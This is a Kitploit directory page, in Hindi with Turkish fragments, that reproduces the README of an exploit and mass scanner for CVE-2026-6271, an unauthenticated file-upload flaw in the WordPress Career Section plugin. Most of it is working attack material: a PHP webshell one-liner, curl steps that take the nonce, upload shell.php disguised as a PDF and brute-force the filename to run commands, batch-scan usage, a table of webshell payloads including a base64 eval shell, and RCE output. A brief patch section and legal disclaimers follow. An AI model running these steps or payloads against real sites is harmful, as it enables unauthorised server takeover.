Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6271 — स्वचालित स्कैनर CVE-2026-6271 के लिए, जो WordPress Career Section प्लगइन में एक गंभीर अप्रमाणित मनमाना फ़ाइल अपलोड है जो RCE की ओर ले जाता है। यह मल्टी-थ्रेडेड स्कैनिंग, एकाधिक शेल प्रकार, और प्रॉक्सी इंटीग्रेशन का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-6271
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubxxconi/cve-2026-6271

CVE-2026-6271

स्वचालित स्कैनर CVE-2026-6271 के लिए, जो WordPress Career Section प्लगइन में एक गंभीर अप्रमाणित मनमाना फ़ाइल अपलोड है जो RCE की ओर ले जाता है। यह मल्टी-थ्रेडेड स्कैनिंग, एकाधिक शेल प्रकार, और प्रॉक्सी इंटीग्रेशन का समर्थन करता है।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-6271 — Career Section वर्डप्रेस प्लगइन RCE स्कैनर

प्लगइन: Career Section (career-section) CVE आईडी: CVE-2026-6271 CVSS स्कोर: 9.8 (गंभीर) CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H भेद्यता प्रकार: अप्रमाणित मनमाना फ़ाइल अपलोड → दूरस्थ कोड निष्पादन प्रभावित संस्करण: <= 1.7 पैच संस्करण: 1.8 प्रकाशन तिथि: 13 मई 2026 शोधकर्ता: Paolo Tresso — Wordfence


📌 भेद्यता के बारे में

Career Section प्लगइन, साइट मालिकों को नौकरी के विज्ञापन प्रकाशित करने और आवेदन एकत्र करने की अनुमति देता है। प्रत्येक नौकरी विज्ञापन पृष्ठ पर एक "Apply Now" फ़ॉर्म होता है। इस फ़ॉर्म में एक CV फ़ाइल अपलोड क्षेत्र शामिल है।

1.7 और पिछले संस्करणों में अपलोड हैंडलर किसी भी फ़ाइल प्रकार को स्वीकार करता है — .php सहित। चूंकि फ़ॉर्म सार्वजनिक है और CSRF टोकन पृष्ठ HTML में एम्बेडेड है, इसलिए बिना किसी खाते या अनुमति की आवश्यकता के इस भेद्यता का शोषण किया जा सकता है।


⚙️ तकनीकी विश्लेषण

नॉन्स सुरक्षा क्यों प्रदान नहीं करता?

WordPress नॉन्स CSRF टोकन हैं, प्रमाणीकरण टोकन नहीं। नॉन्स मान प्रत्येक आगंतुक के लिए पृष्ठ HTML में एम्बेडेड होता है:

root@kitploit:~
<script id='prosolwpclient-public-js-extra'>
<!-- templates/single-csection.php — line 316 -->
<?php wp_nonce_field( 'csaf_form_submission', 'csaf_form_nonce' ); ?>

कोई भी अप्रमाणित आगंतुक एक वैध नॉन्स प्राप्त कर सकता है और सत्यापन जांच पास कर सकता है।

फ़ाइल प्रकार सत्यापन गायब

root@kitploit:~
// templates/single-csection.php — lines 170–182 (version 1.7)
if ( ! empty( $_FILES['cv']['name'] ) && ! empty( $_FILES['cv']['tmp_name'] ) ) {

    $original_name = sanitize_file_name( $_FILES['cv']['name'] );
    $name_file     = time() . '_' . $original_name;
    $destination   = $cs_dir . '/' . $name_file;

    // Uzantı kontrolü YOK — .php dahil her şey kabul edilir
    if ( $wp_filesystem->move( $_FILES['cv']['tmp_name'], $destination, true ) ) {
        $uploaded_file_url = $upload_dir['baseurl']
                           . '/cs_applicant_submission_files/'
                           . $name_file;
    }
}

sanitize_file_name() केवल विशेष वर्णों को साफ करता है, खतरनाक एक्सटेंशन को रोकता नहीं है।

अपलोड निर्देशिका

root@kitploit:~
wp-content/uploads/cs_applicant_submission_files/<timestamp>_<filename>

इस निर्देशिका में PHP निष्पादन को रोकने वाली .htaccess फ़ाइल नहीं है।


🔴 यह गंभीर क्यों है?

कारणविवरण
प्रमाणीकरण आवश्यक नहींनॉन्स सार्वजनिक HTML में एम्बेडेड
फ़ाइल प्रकार प्रतिबंध नहीं.php, .php5, .phtml स्वीकार्य
.htaccess सुरक्षा नहींअपलोड निर्देशिका में PHP चलता है
अनुमान लगाने योग्य फ़ाइल नामtime()_filename → टाइमस्टैम्प ब्रूट-फ़ोर्स

🧪 प्रूफ ऑफ कॉन्सेप्ट (मैन्युअल)

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है।

पूर्वापेक्षाएँ:

  • Career Section प्लगइन स्थापित और सक्रिय (संस्करण ≤ 1.7)
  • कम से कम एक नौकरी विज्ञापन प्रकाशित

चरण 1 — PHP वेबशेल बनाएँ

root@kitploit:~
echo '<?php system($_GET["cmd"]); ?>' > shell.php

चरण 2 — नॉन्स प्राप्त करें

root@kitploit:~
TARGET="http://target.com"
JOB_URL="$TARGET/careers/software-engineer/"

NONCE=$(curl -s "$JOB_URL" \
  | grep -oP 'name="csaf_form_nonce" value="\K[^"]+')

echo "Nonce: $NONCE"

पृष्ठ स्रोत में खोजी जाने वाली संरचना:

root@kitploit:~
<input type="hidden"
       id="csaf_form_nonce"
       name="csaf_form_nonce"
       value="a1b2c3d4e5" />

चरण 3 — वेबशेल अपलोड करें

root@kitploit:~
TS=$(date +%s)

curl -s -X POST "$JOB_URL" \
  -F "first_name=John" \
  -F "last_name=Doe" \
  -F "present_address=123 Main St" \
  -F "[email protected]" \
  -F "mobile_no=1234567890" \
  -F "post_name=Engineer" \
  -F "submit=Submit" \
  -F "csaf_form_nonce=$NONCE" \
  -F "[email protected];type=application/pdf" \
  | grep -o "Application has been sent"

चरण 4 — RCE ट्रिगर करें

फ़ाइल नाम <timestamp>_shell.php फ़ॉर्मेट में है। $TS के आसपास टाइमस्टैम्प आज़माएं:

root@kitploit:~
UPLOADS="$TARGET/wp-content/uploads/cs_applicant_submission_files"

for T in $(seq $((TS-2)) $((TS+2))); do
  URL="$UPLOADS/${T}_shell.php"
  RESULT=$(curl -s "$URL?cmd=id")
  if echo "$RESULT" | grep -q "uid="; then
    echo "Webshell aktif: $URL"
    echo "RCE çıktısı  : $RESULT"
    break
  fi
done

अपेक्षित आउटपुट:

root@kitploit:~
Webshell aktif: http://target.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php
RCE çıktısı  : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🛠️ स्वचालित स्कैनर

स्थापना

root@kitploit:~
git clone https://github.com/kullanici/cve-2026-6271-scanner
cd cve-2026-6271-scanner
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests

🚀 उपयोग

एकल लक्ष्य

root@kitploit:~
python career_section_rce.py -u http://hedef.com

सीधे जॉब URL के साथ

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --job-url http://hedef.com/careers/engineer/

शेल सत्यापन के साथ

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --verify-cmd "whoami"

बैच स्कैन

root@kitploit:~
python career_section_rce.py -l targets.txt -t 20 -o sonuclar.txt

टाइमस्टैम्प विंडो बढ़ाएँ (धीमे सर्वर)

root@kitploit:~
python career_section_rce.py -u http://hedef.com --ts-window 10

फुल शेल + प्रॉक्सी (Burp Suite)

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --shell-type full \
  --proxy http://127.0.0.1:8080

⚙️ पैरामीटर

पैरामीटरसंक्षिप्तविवरणडिफ़ॉल्ट
--url-uएकल लक्ष्य URL—
--list-lलक्ष्य सूची फ़ाइल—
--threads-tथ्रेड संख्या10
--output-oआउटपुट फ़ाइलrce_confirmed.txt
--job-url—सीधे जॉब लिस्टिंग URL—
--shell-name—अपलोड की जाने वाली फ़ाइल का नामshell.php
--shell-type—शेल प्रकारsystem
--verify-cmd—RCE सत्यापन कमांडid
--ts-window—टाइमस्टैम्प ब्रूट-फ़ोर्स विंडो (±सेकंड)5
--proxy—प्रॉक्सी URL—
--timeout—अनुरोध टाइमआउट (सेकंड)10

💀 शेल प्रकार

प्रकारपेलोडविवरण
system<?php system($_GET["cmd"]); ?>मूल सिस्टम कमांड
passthru<?php passthru($_GET["cmd"]); ?>कच्चा आउटपुट
exec<?php echo exec($_GET["cmd"]); ?>मूक निष्पादन
assert<?php assert($_POST["cmd"]); ?>POST के साथ eval
b64<?php eval(base64_decode($_POST["cmd"])); ?>Base64 अस्पष्टीकरण
fullshell_exec + system + exec fallbackपूर्ण क्षमता वाला शेल

📂 शेल अपलोड स्थान

root@kitploit:~
WordPress Kök/
└── wp-content/
    └── uploads/
        └── cs_applicant_submission_files/
            └── <timestamp>_shell.php   ← Shell burada

सीधी पहुंच:

root@kitploit:~
curl "http://hedef.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

📊 स्कैनर आउटपुट स्थितियाँ

स्थितिविवरण
★ RCE OKशेल अपलोड + कमांड सफलतापूर्वक निष्पादित
★ SHELL ALIVEशेल सुलभ, भिन्न प्रतिक्रिया लौटी
~ EXEC_DISABLEDशेल मौजूद है लेकिन exec() सर्वर पर बंद है
? UPLOADEDअपलोड हुआ लेकिन टाइमस्टैम्प नहीं मिला
- BLOCKEDफ़ाइल प्रकार अवरुद्ध (पैच संस्करण)
~ NO_NONCEcsaf_form_nonce नहीं मिला
~ TIMEOUTकनेक्शन टाइमआउट
~ UNREACHलक्ष्य तक नहीं पहुँचा जा सकता

🖥️ नमूना स्कैनर आउटपुट

root@kitploit:~
[*] 3 लक्ष्य | CVE-2026-6271 Career Section | threads=10

[★ RCE OK    ] http://hedef1.com
  Nonce     : a1b2c3d4e5  (स्रोत: http://hedef1.com/careers/engineer/)
  Shell URL : http://hedef1.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php
  RCE आउटपुट : uid=33(www-data) gid=33(www-data) groups=33(www-data)

[- BLOCKED   ] http://hedef2.com  (फ़ाइल प्रकार अवरुद्ध)
[~ NO_NONCE  ] http://hedef3.com  (csaf_form_nonce नहीं मिला)

──────────────────────────────────────────────────────────────
  UPLOADED_RCE_OK         :    1  █
  BLOCKED                 :    1  █
  NO_NONCE                :    1  █
──────────────────────────────────────────────────────────────
  RCE पुष्ट → rce_confirmed.txt
──────────────────────────────────────────────────────────────

🛡️ बचाव / पैच

उपायकार्यान्वयन
प्लगइन अपडेटCareer Section 1.8 या उससे ऊपर अपग्रेड करें
PHP निष्पादन अवरोधअपलोड निर्देशिका में .htaccess जोड़ें
एक्सटेंशन श्वेतसूचीकेवल pdf, doc, docx स्वीकार करें
MIME सत्यापनfinfo_file() के साथ वास्तविक सामग्री जांच
WAF नियम.php अपलोड अनुरोधों को अवरुद्ध करें

wp-content/uploads/cs_applicant_submission_files/ निर्देशिका के लिए .htaccess:

root@kitploit:~
<FilesMatch "\.php\d?$">
    Deny from all
</FilesMatch>

Options -ExecCGI
AddType text/plain .php .php5 .phtml .phar

📁 फ़ाइल संरचना

root@kitploit:~
cve-2026-6271-scanner/
├── career_section_rce.py   # Ana tarayıcı
├── requirements.txt        # Bağımlılıklar
└── README.md               # Bu dosya

⚠️ कानूनी अस्वीकरण

यह उपकरण और PoC केवल अधिकृत सिस्टम पर, शैक्षिक उद्देश्यों और penetration परीक्षण के लिए तैयार किया गया है। अनधिकृत सिस्टम पर उपयोग तुर्की दंड संहिता के अनुच्छेद 243-245 और अंतरराष्ट्रीय साइबर अपराध कानूनों के तहत अपराध है। डेवलपर उपकरण के दुरुपयोग से उत्पन्न किसी भी कानूनी देयता को स्वीकार नहीं करता है।


📄 लाइसेंस

MIT लाइसेंस — केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए।


🔗 संदर्भ

  • Wordfence Advisory
  • WordPress प्लगइन निर्देशिका — Career Section
  • CVSS 3.1 कैलकुलेटर
टूल डाउनलोड करें